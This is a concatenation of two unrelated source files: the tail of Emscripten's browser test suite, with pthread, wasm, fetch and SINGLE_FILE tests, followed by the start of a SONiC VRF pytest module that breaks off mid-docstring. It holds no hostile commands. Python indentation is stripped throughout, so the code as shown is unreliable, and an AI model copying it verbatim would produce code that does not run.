self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
def test_pthread_call_async_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
def test_pthread_global_data_initialization(self):
for mem_init_mode in [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]:
for args in [[], ['-O3']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args+mem_init_mode+['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'], also_wasm=False)
# test atomicrmw i64
def test_atomicrmw_i64(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'atomicrmw_i64.ll'), '-s', 'USE_PTHREADS=1', '-s', 'IN_TEST_HARNESS=1', '-o', 'test.html']).communicate()
self.run_browser('test.html', None, '/report_result?0')
# Test that it is possible to send a signal via calling alarm(timeout), which in turn calls to the signal handler set by signal(SIGALRM, func);
def test_sigalrm(self):
self.btest(path_from_root('tests', 'sigalrm.cpp'), expected='0', args=['-O3'], timeout=30)
def test_meminit_pairs(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join(''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256))
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1"]
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
def test_meminit_big(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join([''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256)]*256)
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
assert len(d) > (1 << 27) # more than 32M memory initializer
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1"]
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests/canvas_style_proxy_shell.html'), '--pre-js', path_from_root('tests/canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(path_from_root('tests', 'canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(path_from_root('tests', 'custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests', 'custom_messages_proxy_shell.html'), '--post-js', path_from_root('tests', 'custom_messages_proxy_postjs.js')])
def test_separate_asm(self):
for opts in [['-O0'], ['-O1'], ['-O2'], ['-O2', '--closure', '1']]:
print(opts)
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'test.html'] + opts).communicate()
self.run_browser('test.html', None, '/report_result?0')
open('one.html', 'w').write('<script src="test.js"></script>')
self.run_browser('one.html', None, '/report_result?0')
Popen([PYTHON, path_from_root('tools', 'separate_asm.py'), 'test.js', 'asm.js', 'rest.js']).communicate()
open('two.html', 'w').write('''
<script>
var Module = {};
</script>
<script src="asm.js"></script>
<script src="rest.js"></script>
''')
self.run_browser('two.html', None, '/report_result?0')
self.clear()
assert not os.path.exists('tests.asm.js')
self.btest('browser_test_hello_world.c', expected='0', args=opts + ['--separate-asm'])
assert os.path.exists('test.asm.js')
os.unlink('test.asm.js')
self.run_browser('test.html', None, '[no http server activity]', timeout=5) # fail without the asm
def test_emterpretify_file(self):
open('shell.html', 'w').write('''
<!--
{{{ SCRIPT }}} // ignore this, we do it ourselves
-->
<script>
var Module = {};
var xhr = new XMLHttpRequest();
xhr.open('GET', 'code.dat', true);
xhr.responseType = 'arraybuffer';
xhr.onload = function() {
Module.emterpreterFile = xhr.response;
var script = document.createElement('script');
script.src = "test.js";
document.body.appendChild(script);
};
xhr.send(null);
</script>
''')
try_delete('code.dat');
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '--shell-file', 'shell.html', '-s', 'ASSERTIONS=1'])
assert os.path.exists('code.dat')
try_delete('code.dat');
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '-s', 'ASSERTIONS=1'])
assert os.path.exists('code.dat')
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker']).communicate()
open('test.html', 'w').write('<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o)]
print('plain html')
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'in_flight_memfile_request.c')).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'test.js'] + opts).communicate()
open('test.html', 'w').write('<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
def test_split_memory_large_file(self):
size = 2*1024*1024
open('huge.dat', 'w').write(''.join([chr((x*x)&255) for x in range(size*2)])) # larger than a memory chunk
self.btest('split_memory_large_file.cpp', expected='1', args=['-s', 'SPLIT_MEMORY=' + str(size), '-s', 'TOTAL_MEMORY=128MB', '-s', 'TOTAL_STACK=10240', '--preload-file', 'huge.dat'], timeout=60)
def test_binaryen(self):
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'BINARYEN=1', '-s', 'BINARYEN_METHOD="interpret-binary"'])
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'BINARYEN=1', '-s', 'BINARYEN_METHOD="interpret-binary"', '-O2'])
def test_binaryen_native(self):
for opts in [
[],
['-O1'],
['-O2'],
['-O3'],
['-Os'],
['-Oz'],
['-O2', '--js-opts', '1'],
['-O2', '-s', 'EMTERPRETIFY=1'],
['-O2', '-s', 'ALLOW_MEMORY_GROWTH=1'],
['-O2', '-s', 'EMTERPRETIFY=1', '-s', 'ALLOW_MEMORY_GROWTH=1'],
['-O2', '-s', 'OUTLINING_LIMIT=1000'],
['-O2', '--closure', '1'],
]:
print(opts)
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'BINARYEN=1'] + opts)
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
Module.printErr = function(x) {
Module.print('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['-s', 'WASM=1', '--shell-file', 'shell.html']
for opts, expect in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'BINARYEN_ASYNC_COMPILATION=1'], 1), # force it on
(['-O1', '-s', 'BINARYEN_ASYNC_COMPILATION=0'], 0), # force it off
(['-s', 'BINARYEN_ASYNC_COMPILATION=1', '-s', 'BINARYEN_METHOD="native-wasm,asmjs"'], 0), # try to force it on, but have it disabled
]:
print(opts, expect)
self.btest('binaryen_async.c', expected=str(expect), args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest('binaryen_async.c', expected='1', args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
def test_manual_wasm_instantiate(self):
src = os.path.join(self.get_dir(), 'src.cpp')
open(src, 'w').write(self.with_report_result(open(os.path.join(path_from_root('tests/manual_wasm_instantiate.cpp'))).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'manual_wasm_instantiate.js', '-s', 'BINARYEN=1']).communicate()
shutil.copyfile(path_from_root('tests', 'manual_wasm_instantiate.html'), os.path.join(self.get_dir(), 'manual_wasm_instantiate.html'))
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_binaryen_worker(self):
self.do_test_worker(['-s', 'WASM=1'])
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where pthread-main.js will be loaded from.
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'cdn'))
open('shell2.html', 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
subprocess.check_call([PYTHON, EMCC, 'src.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=1', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest('benchmark_utf8.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF8ToString"]'])
def test_utf16_textdecoder(self):
self.btest('benchmark_utf16.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF16ToString","stringToUTF16","lengthBytesUTF16"]'])
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL'])
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args+['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL'])
# Tests the feature that shell html page can preallocate the typed array and place it to Module.buffer before loading the script page.
# In this build mode, the -s TOTAL_MEMORY=xxx option will be ignored.
def test_preallocated_heap(self):
self.btest('test_preallocated_heap.cpp', expected='1', args=['-s', 'TOTAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', path_from_root('tests', 'test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-DFILE_DOES_NOT_EXIST'])
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/to_memory.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'])
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/cached_xhr.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'])
# Test emscripten_fetch() usage to stream a XHR in to memory without storing the full file in memory
def test_fetch_stream_file(self):
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
f = open('largefile.txt', 'w')
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
for i in range(1024):
f.write(s)
f.close()
self.btest('fetch/stream_file.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'TOTAL_MEMORY=536870912'])
# Tests emscripten_fetch() usage in synchronous mode.
def test_fetch_sync_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/sync_xhr.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_fetch_idb_delete(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
os.mkdir(os.path.join(self.get_dir(), 'dirrey'))
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest('asmfs/hello_file.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_asmfs_read_file_twice(self):
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'hello_file.txt'))
self.btest('asmfs/read_file_twice.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_asmfs_fopen_write(self):
self.btest('asmfs/fopen_write.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_unistd_close(self):
self.btest('unistd/close.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_unistd_access(self):
self.btest('unistd/access.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest('unistd/unlink.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-DNO_SYMLINK=1'])
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl-open/src.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_asmfs_relative_paths(self):
self.btest('asmfs/relative_paths.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'],
['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Tests the absolute minimum pthread-enabled application.
def test_hello_thread(self):
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS=1'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
def test_load_js_from_blob_with_pthreads(self):
src = os.path.join(self.get_dir(), 'src.c')
open(src, 'w').write(self.with_report_result(open(path_from_root('tests', 'pthread', 'hello_thread.c')).read()))
Popen([PYTHON, EMCC, 'src.c', '-s', 'USE_PTHREADS=1', '-o', 'hello_thread_with_blob_url.js']).communicate()
shutil.copyfile(path_from_root('tests', 'pthread', 'main_js_as_blob_loader.html'), os.path.join(self.get_dir(), 'hello_thread_with_blob_url.html'))
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
opts = ['-s', 'SINGLE_FILE=1', '-s', 'WASM=1', '-s', "BINARYEN_METHOD='interpret-binary'"]
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
REPORT_RESULT(0);
return 0;
}
'''
open('test.c', 'w').write(self.with_report_result(src))
# generate a dummy file
open('dummy_file', 'w').write('dummy')
# compile the code with the modularize feature and the preload-file option enabled
Popen([PYTHON, EMCC, 'test.c', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts).communicate()
open('a.html', 'w').write('''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=['-s', 'SINGLE_FILE=1', '-s', 'WASM=1', '-s', "BINARYEN_METHOD='native-wasm'"], also_proxied=True)
assert os.path.exists('test.html') and not os.path.exists('test.js') and not os.path.exists('test.worker.js')
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
for wasm_enabled in [True, False]:
args = [PYTHON, EMCC, 'src.cpp', '-o', 'test.js', '-s', 'SINGLE_FILE=1']
if wasm_enabled:
args += ['-s', 'WASM=1']
run_process(args)
open('test.html', 'w').write('''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE=1', '-s', 'WASM=1', '-s', "BINARYEN_METHOD='native-wasm'"]).communicate()
open('test.html', 'w').write('<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
assert os.path.exists('test.js') and not os.path.exists('test.worker.js')
def test_access_file_after_heap_resize(self):
open('test.txt', 'w').write('hello from file')
open('page.c', 'w').write(self.with_report_result(open(path_from_root('tests', 'access_file_after_heap_resize.c'), 'r').read()))
Popen([PYTHON, EMCC, 'page.c', '-s', 'WASM=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '--preload-file', 'test.txt', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
open(self.in_dir('main.cpp'), 'w').write(self.with_report_result(r'''
int main() {
REPORT_RESULT(0);
return 0;
}
'''))
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
subprocess.check_output([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
|
test_vrf.py
|
import sys
import time
import threading
import Queue
import yaml
import json
import random
import logging
import tempfile
import traceback
from collections import OrderedDict
from natsort import natsorted
from netaddr import IPNetwork
import pytest
from tests.common.fixtures.ptfhost_utils import copy_ptftests_directory # lgtm[py/unused-import]
from tests.common.fixtures.ptfhost_utils import change_mac_addresses # lgtm[py/unused-import]
from tests.common.storage_backend.backend_utils import skip_test_module_over_backend_topologies # lgtm[py/unused-import]
from tests.ptf_runner import ptf_runner
from tests.common.utilities import wait_until
from tests.common.reboot import reboot
"""
During vrf testing, a vrf basic configuration need to be setup before any tests,
and cleanup after all tests. Both of the two tasks should be called only once.
A module-scoped fixture `setup_vrf` is added to accompilsh the setup/cleanup tasks.
We want to use ansible_adhoc/tbinfo fixtures during the setup/cleanup stages, but
1. Injecting fixtures to xunit-style setup/teardown functions is not support by
[now](https://github.com/pytest-dev/pytest/issues/5289).
2. Calling a fixture function directly is deprecated.
So, we prefer a fixture rather than xunit-style setup/teardown functions.
"""
pytestmark = [
pytest.mark.topology('t0')
]
logger = logging.getLogger(__name__)
# global variables
g_vars = {}
PTF_TEST_PORT_MAP = '/root/ptf_test_port_map.json'
# helper functions
def get_vlan_members(vlan_name, cfg_facts):
tmp_member_list = []
for m in cfg_facts['VLAN_MEMBER'].keys():
v, port = m.split('|')
if vlan_name == v:
tmp_member_list.append(port)
return natsorted(tmp_member_list)
def get_pc_members(portchannel_name, cfg_facts):
tmp_member_list = []
for m in cfg_facts['PORTCHANNEL_MEMBER'].keys():
pc, port = m.split('|')
if portchannel_name == pc:
tmp_member_list.append(port)
return natsorted(tmp_member_list)
def get_intf_ips(interface_name, cfg_facts):
prefix_to_intf_table_map = {
'Vlan': 'VLAN_INTERFACE',
'PortChannel': 'PORTCHANNEL_INTERFACE',
'Ethernet': 'INTERFACE',
'Loopback': 'LOOPBACK_INTERFACE'
}
intf_table_name = None
ip_facts = {
'ipv4': [],
'ipv6': []
}
for pfx, t_name in prefix_to_intf_table_map.iteritems():
if pfx in interface_name:
intf_table_name = t_name
break
if intf_table_name is None:
return ip_facts
for intf in cfg_facts[intf_table_name]:
if '|' in intf:
if_name, ip = intf.split('|')
if if_name == interface_name:
ip = IPNetwork(ip)
if ip.version == 4:
ip_facts['ipv4'].append(ip)
else:
ip_facts['ipv6'].append(ip)
return ip_facts
def get_cfg_facts(duthost):
tmp_facts = json.loads(duthost.shell("sonic-cfggen -d --print-data")['stdout']) # return config db contents(running-config)
port_name_list_sorted = natsorted(tmp_facts['PORT'].keys())
port_index_map = {}
for idx, val in enumerate(port_name_list_sorted):
port_index_map[val] = idx
tmp_facts['config_port_indices'] = port_index_map
return tmp_facts
def get_vrf_intfs(cfg_facts):
intf_tables = ['INTERFACE', 'PORTCHANNEL_INTERFACE', 'VLAN_INTERFACE', 'LOOPBACK_INTERFACE']
vrf_intfs = {}
for table in intf_tables:
for intf, attrs in cfg_facts.get(table, {}).iteritems():
if '|' not in intf:
vrf = attrs['vrf_name']
if vrf not in vrf_intfs:
vrf_intfs[vrf] = {}
vrf_intfs[vrf][intf] = get_intf_ips(intf, cfg_facts)
return vrf_intfs
def get_vrf_ports(cfg_facts):
'''
:return: vrf_member_port_indices, vrf_intf_member_port_indices
'''
vlan_member = cfg_facts['VLAN_MEMBER'].keys()
pc_member = cfg_facts['PORTCHANNEL_MEMBER'].keys()
member = vlan_member + pc_member
vrf_intf_member_port_indices = {}
vrf_member_port_indices = {}
vrf_intfs = get_vrf_intfs(cfg_facts)
for vrf, intfs in vrf_intfs.iteritems():
vrf_intf_member_port_indices[vrf] = {}
vrf_member_port_indices[vrf] = []
for intf in intfs:
vrf_intf_member_port_indices[vrf][intf] = natsorted(
[ cfg_facts['config_port_indices'][m.split('|')[1]] for m in filter(lambda m: intf in m, member) ]
)
vrf_member_port_indices[vrf].extend(vrf_intf_member_port_indices[vrf][intf])
vrf_member_port_indices[vrf] = natsorted(vrf_member_port_indices[vrf])
return vrf_intf_member_port_indices, vrf_member_port_indices
def ex_ptf_runner(ptf_runner, exc_queue, **kwargs):
'''
With this simple warpper function, we could use a Queue to store the
exception infos and check it later in main thread.
Example:
refer to test 'test_vrf_swss_warm_reboot'
'''
try:
ptf_runner(**kwargs)
except Exception:
exc_queue.put(sys.exc_info())
def finalize_warmboot(duthost, comp_list=None, retry=30, interval=5):
'''
Check if componets finish warmboot(reconciled).
'''
DEFAULT_COMPONENT_LIST = ['orchagent', 'neighsyncd']
EXP_STATE = 'reconciled'
comp_list = comp_list or DEFAULT_COMPONENT_LIST
# wait up to $retry * $interval secs
for _ in range(retry):
for comp in comp_list:
state = duthost.shell('/usr/bin/redis-cli -n 6 hget "WARM_RESTART_TABLE|{}" state'.format(comp), module_ignore_errors=True)['stdout']
logger.info("{} : {}".format(comp, state))
if EXP_STATE == state:
comp_list.remove(comp)
if len(comp_list) == 0:
break
time.sleep(interval)
logger.info("Slept {} seconds!".format(interval))
return comp_list
def check_interface_status(duthost, up_ports):
intf_facts = duthost.interface_facts(up_ports=up_ports)['ansible_facts']
if len(intf_facts['ansible_interface_link_down_ports']) != 0:
logger.info("Some ports went down: {} ...".format(intf_facts['ansible_interface_link_down_ports']))
return False
return True
def check_bgp_peer_state(duthost, vrf, peer_ip, expected_state):
peer_info = json.loads(duthost.shell("vtysh -c 'show bgp vrf {} neighbors {} json'".format(vrf, peer_ip))['stdout'])
logger.debug("Vrf {} bgp peer {} infos: {}".format(vrf, peer_ip, peer_info))
try:
peer_state = peer_info[peer_ip].get('bgpState', 'Unknown')
except Exception as e:
peer_state = 'Unknown'
if peer_state != expected_state:
logger.info("Vrf {} bgp peer {} is {}, exptected {}!".format(vrf, peer_ip, peer_state, expected_state))
return False
return True
def check_bgp_facts(duthost, cfg_facts):
result = {}
for neigh in cfg_facts['BGP_NEIGHBOR']:
if '|' not in neigh:
vrf = 'default'
peer_ip = neigh
else:
vrf, peer_ip = neigh.split('|')
result[(vrf, peer_ip)] = check_bgp_peer_state(duthost, vrf, peer_ip, expected_state='Established')
return all(result.values())
def setup_vrf_cfg(duthost, localhost, cfg_facts):
'''
setup vrf configuration on dut before test suite
'''
# FIXME
# For vrf testing, we should create a new vrf topology
# might named to be 't0-vrf', deploy with minigraph templates.
#
# But currently vrf related schema does not properly define in minigraph.
# So we generate and deploy vrf basic configuration with a vrf jinja2 template,
# later should move to minigraph or a better way(VRF and BGP cli).
from copy import deepcopy
cfg_t0 = deepcopy(cfg_facts)
cfg_t0.pop('config_port_indices', None)
# get members from Vlan1000, and move half of them to Vlan2000 in vrf basic cfg
ports = get_vlan_members('Vlan1000', cfg_facts)
vlan_ports = {'Vlan1000': ports[:len(ports)/2],
'Vlan2000': ports[len(ports)/2:]}
extra_vars = {'cfg_t0': cfg_t0,
'vlan_ports': vlan_ports}
duthost.host.options['variable_manager'].extra_vars.update(extra_vars)
duthost.template(src="vrf/vrf_config_db.j2", dest="/tmp/config_db_vrf.json")
duthost.shell("cp /tmp/config_db_vrf.json /etc/sonic/config_db.json")
reboot(duthost, localhost)
def setup_vlan_peer(duthost, ptfhost, cfg_facts):
'''
setup vlan peer ip addresses on peer port(ptf).
Example:
vid local-port peer-port peer-macvlan-dev peer-namespace peer-ip
Vlan1000 Ethernet1 eth1 e1mv1 ns1000 192.168.0.2/21
FC00:192::2/117
